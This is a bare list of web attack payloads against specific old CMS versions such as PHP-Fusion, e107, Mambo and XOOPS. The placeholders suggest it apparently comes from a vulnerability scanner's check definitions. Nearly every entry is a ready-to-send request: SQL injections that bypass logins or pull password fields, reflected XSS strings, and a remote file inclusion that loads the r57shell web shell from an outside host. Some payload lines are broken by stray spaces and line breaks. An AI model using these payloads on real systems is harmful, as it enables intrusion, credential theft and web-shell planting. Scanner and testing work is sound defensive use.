PHP-Fusion 6.00.109 SQL Injection

faq.php?cat_id=1%27%20or%20force_mysql_error%3D%27 2

MySource 2.14.0 File Inclusion

init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt

e107 v0617 SQL Injection

e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F*&a_password=&usubmit=Continue

lucidCMS 1.0.11 SQL Injection

index.php?command=panel

PhpWebThings 1.4.4 SQL Injection

forum.php?forum=-1%20union%20select%20password,password,null,null%2 0from%

20test_mysql_injection%20where%20uid=1/*

Envolution v.1.1.0 SQL Injection

modules.php?op=modload&name=News&file=index&catid=%221%22%20AND%20force_error=error

Acidcat v.2.1.13 SQL Injection

default.asp?ID=26%20union%20select%201,2,2,3,passw ord,5,6%20from%20Configuration

DEV v1.5 SQL Injection

index.php?session=0&action=openforum&cat=force_error

SiteEnable v.3.3 XSS

login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22

PortalApp v.3.3 XSS

login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22

Typo3 v.3.8.1 Раскрытие пути

/tslib/showpic.php

RunCMS v.1.3a5 XSS

/modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3Ealert('xss-${random}');

%3C/script%3E%3Cbr%20name=%22nothing

Mambo v.4.5.3h SQL Injection

/index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypassword&option=login&Submit=Login&op2=login&lang

=english&return=${file}&message=0

Dragonfly CMS v.9.0.6.1 XSS

/index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat

=0&news_search_comments=0&coppermine=

Nodez v.4.6.1.1 XSS

/index.php?node=system&op=block%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)

%3C/script%3E&block=3&bop=more

XOOPS v.2.0.11 SQL Injection

/xmlrpc.php POST <?xml version="1.0"?><methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value>

<string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>